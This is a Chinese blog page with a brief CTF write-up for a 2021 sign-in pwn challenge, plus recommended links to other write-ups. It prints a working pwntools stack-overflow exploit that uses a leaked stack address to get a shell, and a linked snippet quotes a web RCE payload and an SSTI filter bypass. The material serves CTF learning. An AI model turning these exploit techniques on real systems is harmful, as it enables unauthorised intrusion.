2021长安抗疫杯签到pwn

最新推荐文章于 2023-05-31 00:55:23 发布

原创最新推荐文章于 2023-05-31 00:55:23 发布 · 286 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#pwn

pwn 专栏收录该内容

6 篇文章

订阅专栏

本文介绍了一个具体的PWN题目解决过程，通过分析程序漏洞，利用checksec检查安全配置，并借助IDA工具辅助定位，最终实现了栈溢出攻击，成功绕过保护机制获取shell。

checksec：
在这里插入图片描述
发现32位，开了NX，没别的保护，使用ida打开：

发现打印出了一个gift，直接运行，竟然是buf的栈地址。
binsh地址也知道了，
首先填充栈，其中一开始是binsh的地址，
然后填充栈，最后覆盖ebp为栈地址
思路直接打开：

from pwn import*
p = process("./pwn1")
#p = remote("113.201.14.253",16088)
p.recvuntil("Gift:")
leak = int(p.recv(10),16)
p.sendline(p32(0x8048540) + "b"*0x30 + p32(leak+4))
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

p0int3r

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

长安“战疫“网络安全卫士守护赛--PWN

weixin_51055545的博客

01-09

445

今天早上定了闹钟起来干题，还没怎么睡醒这里我把前两道pwn题给分析一下 pwn1 例行检查： 32位，没有开canary保护，没有pie，扔到IDA中 buf大小0x38，判断为栈溢出，还有后门，心中正在窃喜，长安这道签到题是真简单呀，但做了之后发现这里main函数最后的返回还应注意一下调用完read之后，不是leave retn，而是多了一行lea esp ,[ecx-4],这里应注意一下，将ecx-4的地址给了esp，相当于返回到了ecx-4的地址，(注意lea 区别于mov，mov传送的是地址

攻防世界PWN之notebook题解

seaaseesa的博客

11-21

618

Notebook 研究了一下，做出来的人挺少，还挺有成就感首先，检查一下程序的保护机制，发现PIE和RELRO未开启然后，我们用IDA分析一下,看起来好复杂的样子发现有溢出和格式化字符串漏洞首先当然是想到利用格式化字符串漏洞来泄露canary的值要想执行格式化字符串漏洞，得满足那个if条件我想了好久，才反应过来，如果有传入格式化的字符串，这个条件就不可...

参与评论您还未登录，请先登录后发表或查看评论

长安“战疫“网络安全赛Writeup

Le1a's Blog

01-12

4049

Web RCE_No_Para 无参RCE ?1=system('tac flag.php');&code=eval(current(current(get_defined_vars()))); flask admin?static.js? 然后发现传参点：?name= 简单试了下SSTI，发现过滤了引号等符号考虑attr结合16进制来绕过 {{a|attr(%27\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f%27)|attr(%27\x5f\x5f\x62\x6

长城杯2021 pwn

清霂的博客

09-20

976

长城杯20211.K1ng_in_h3Ap_I2.K1ng_in_h3Ap_II 菜鸡第一次在国内比赛做出两道题，害，长城杯比第五空间温柔多了，第五空间一道rop，之后就直接vm，musl都没学过，还有个c++逆向8出来。打完国赛（写了一道简单堆题，orw调一晚上没出来，服了）之后划水时间太长了，8月下旬才开始继续学堆，争取10月底前把vm，musl，mips，arm这种其他架构（不知道算不算）的pwn学习一下。 1.K1ng_in_h3Ap_I 题目给了3个字节libc地址，操作性还是挺强的，借用残留指针

强网杯2022 pwn 赛题解析.docx

12-18

【强网杯2022 Pwn赛题解析】在网络安全竞赛“强网杯”中，Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击，这是一种利用大型bin（large bin）...

赣网杯2021_pwn1.rar

12-11

赣网杯2021 pwn1 bin ctf

【PWN · ret2libc】[SWPUCTF 2021 新生赛]whitegive_pwn

Mr_Fmnwon的博客

05-31

1078

和【PWN · ret2libc】[2021 鹤城杯]babyof_Mr_Fmnwon的博客-优快云博客一样，是一道非常典型（指攻破过程）的ret2libc题目。通过泄露got表、libc偏移等，构造system('/bin/sh')由于exp的思路在上面那篇博客讲的很清楚了，这里就不过多赘述，直接上exp。这一次对于ret有点理解了：gets/puts都放在return后，除了函数本身的调用返回外，还有调用函数处被返回（此时caller作为callee）所以可以填写返回地址，控制执行流。

强网杯2021 pwn 赛题解析——babypwn

CoLin的pwn小屋

07-26

1132

强网杯2021 pwn 赛题回顾——babypwn

Lua非空判断方法[源码]

11-24

本文详细介绍了在Lua中进行非空判断的几种方法，特别是针对table类型的变量。首先，文章指出了直接对nil值进行索引会导致异常的问题，并给出了一个简单的例子来说明如何避免这种情况。接着，文章讨论了如何判断一个table是否为空，指出不能简单地使用`#table == 0`的方式，而是应该使用`next(t) == nil`的方法。此外，文章还提到了`next`指令在LuaJIT中的优化问题，建议在非必要情况下少用。最后，文章简要介绍了如何判断一个字符串是否全部由空格组成，使用了正则匹配的方法。这些内容对于Lua开发者来说非常实用，能够帮助他们避免常见的错误。

JS表格转Excel实现[可运行源码]

11-24

该文章详细介绍了如何使用JavaScript将HTML表格数据导出为Excel文件。内容涵盖了针对不同浏览器的兼容性处理，包括IE和非IE浏览器的不同实现方式。对于IE浏览器，使用ActiveXObject进行导出；对于非IE浏览器，则通过base64编码和数据URI方案实现。文章还提供了完整的代码示例，包括表格数据的处理、格式化和导出功能，支持文本和图片类型的数据导出。

图片转bin文件存储[项目代码]

11-24

本文介绍了在OpenCV项目中如何将大量图片数据转换为二进制（bin）文件进行高效存储和读取的方法。作者在项目中遇到需要处理大量图片数据的问题，尝试了多种格式（如.mat、.txt、.yml）后发现效率较低。通过使用二进制文件存储，显著提升了读写速度。文章详细展示了使用OpenCV将图片写入二进制文件的代码示例，以及从二进制文件读取图片数据的实现方法。虽然该方法需要提前知道图片的尺寸和数量，但读写速度极快，适合处理大量图片数据。作者还提到可以通过换行符或终止符优化读取过程，但未深入探讨。

ROS视觉处理与色彩识别[项目源码]

11-24

本文详细介绍了在ROS环境下进行视觉处理的基础步骤，特别是针对色彩识别的实现方法。内容涵盖了从摄像头驱动的安装与配置（如usb_cam驱动和image_view工具的使用），到创建功能包和编写图像处理节点（包括RGB图像回调函数、HSV色彩空间转换、二值化处理及形态学操作）。此外，还演示了如何在仿真环境中获取图像，并通过OpenCV实现红色和绿色物体的识别与追踪。最后，文章提供了完整的代码示例和编译运行步骤，帮助读者快速上手ROS视觉处理项目。

Anaconda安装与使用指南[项目源码]

11-24

本文详细介绍了在Anaconda环境下安装和使用jupyter及numpy的步骤。首先，指导用户如何安装Anaconda并创建虚拟环境，然后详细说明了如何在虚拟环境中安装jupyter和numpy。接着，文章提供了多个numpy的练习示例，包括创建零向量、矩阵操作、归一化等。此外，还介绍了如何在Jupyter中完成numpy、pandas和matplotlib的例题，涵盖了从基础操作到实际应用的多个方面。最后，文章总结了实验过程中的经验，特别是在使用国内镜像源后下载速度的提升。

【动静障碍物】基于JPS算法（改进A）全局路径规划与DWA动态窗口局部避障的机器人自主导航混合控制算法（Matlab代码实现）

11-24

【动静障碍物】基于JPS算法（改进A）全局路径规划与DWA动态窗口局部避障的机器人自主导航混合控制算法（Matlab代码实现）内容概要：本文介绍了一种结合改进A*算法的JPS（跳跃点搜索）全局路径规划与DWA（动态窗口法）局部避障的混合控制算法，用于机器人在动静态障碍物环境下的自主导航。该算法通过JPS优化全局路径搜索效率，提升路径规划速度，并结合DWA实现实时动态避障，增强了机器人在复杂动态环境中的适应性和安全性。整个系统在Matlab平台上进行了代码实现与仿真验证，展示了良好的路径规划效果与避障性能。; 适合人群：具备一定机器人学、自动控制或路径规划基础知识的研究生、科研人员及从事智能机器人开发的工程技术人员。; 使用场景及目标：①应用于移动机器人在静态与动态障碍共存环境中的自主导航任务；②为研究高效全局规划与实时局部避障的融合策略提供技术参考与实现案例；③支持Matlab仿真环境下的算法验证与优化。; 阅读建议：建议读者结合Matlab代码深入理解JPS与DWA的集成逻辑，重点关注算法在路径最优性、计算效率与避障实时性之间的平衡设计，可进一步扩展至多机器人系统或复杂地形场景的应用研究。

Lua中loadstring应用[源码]

最新发布

11-24

本文介绍了在Lua编程中使用loadstring函数解析字符串公式的方法，特别是在游戏开发中的应用。通过示例代码展示了如何解析包含动态变量的字符串，如属性键、操作符和技能等级等，并动态计算其值。文章详细说明了如何利用loadstring将字符串转换为可执行的Lua代码，并处理复杂的公式解析，如计算buff持续时间和属性加成。这对于需要动态处理游戏内文本和公式的开发者具有实用价值。

VINS-Fusion部署流程[项目源码]

11-24

本文详细介绍了VINS-Fusion的部署及启动流程。首先，系统需要安装Ubuntu16.04以上版本并配置ROS环境，同时安装OpenCV、Glog、Ceres等依赖库。其次，编译功能包并进行多线程编译。启动阶段需获取IMU数据和图像信息，通过模拟器启动VINS-Fusion并查看Rviz可视化效果。标定部分包括相机内参和外参的配置，以及回环检测的优化。最后，文章简要提及实机启动的步骤，包括飞控和相机驱动的安装，以及通过脚本启动VINS-Fusion的流程。

Lua table.concat函数详解[项目源码]

11-24

本文详细介绍了Lua中的table.concat函数，该函数用于连接表中数组部分的元素，并可通过参数指定分隔符、起始和结束位置。文章通过多个示例展示了不同参数组合下的函数行为，包括默认参数的使用、自定义分隔符、指定连接范围等。此外，文章还解释了为何table.concat比for循环更高效，特别是在处理大量字符串连接时，table.concat经过优化，能显著减少时间消耗。最后，文章强调table.concat不会改变原始表的结构，为开发者提供了安全的使用保障。

基于Python的深度学习回归模型实现与神经网络应用

11-24

深度学习作为人工智能的关键分支，依托多层神经网络架构对高维数据进行模式识别与函数逼近，广泛应用于连续变量预测任务。在Python编程环境中，得益于TensorFlow、PyTorch等框架的成熟生态，研究者能够高效构建面向回归分析的神经网络模型。本资源库聚焦于通过循环神经网络及其优化变体解决时序预测问题，特别针对传统RNN在长程依赖建模中的梯度异常现象，引入具有门控机制的长短期记忆网络（LSTM）以增强序列建模能力。实践案例涵盖从数据预处理到模型评估的全流程：首先对原始时序数据进行标准化处理与滑动窗口分割，随后构建包含嵌入层、双向LSTM层及全连接层的网络结构。在模型训练阶段，采用自适应矩估计优化器配合早停策略，通过损失函数曲线监测过拟合现象。性能评估不仅关注均方根误差等量化指标，还通过预测值与真实值的轨迹可视化进行定性分析。资源包内部分为三个核心模块：其一是经过清洗的金融时序数据集，包含标准化后的股价波动记录；其二是模块化编程实现的模型构建、训练与验证流程；其三是基于Matplotlib实现的动态结果展示系统。所有代码均遵循面向对象设计原则，提供完整的类型注解与异常处理机制。该实践项目揭示了深度神经网络在非线性回归任务中的优势：通过多层非线性变换，模型能够捕获数据中的高阶相互作用，而Dropout层与正则化技术的运用则保障了泛化能力。值得注意的是，当处理高频时序数据时，需特别注意序列平稳性检验与季节性分解等预处理步骤，这对预测精度具有决定性影响。资源来源于网络分享，仅用于学习交流使用，请勿用于商业，如有侵权请联系我删除！

搭建OpenStack云平台[源码]

11-24

本文详细介绍了如何使用Kolla工具部署Stein版本的OpenStack云平台。内容涵盖了从实验环境准备、系统配置、Docker服务安装、Kolla和Kolla-Ansible的获取与安装，到OpenStack的部署和验证全过程。作者采用all-in-one模式进行部署，适合初学者快速上手。文章还提供了具体的命令和配置文件修改示例，帮助读者避免常见错误。最后，作者鼓励读者在实际操作中保持细心和耐心，并预告了后续关于OpenStack基本使用方法和创建测试云主机的内容。

2020网鼎杯逆向pwn密码隐写赛题集锦

网鼎杯是国内知名的网络安全比赛，涵盖了多种网络安全领域，包括逆向工程、漏洞挖掘（pwn）、密码学、隐写术等。2020网鼎杯的比赛内容同样遵循这一特点，提供了多个赛题供参赛者挑战，以提升其网络安全技能。逆向...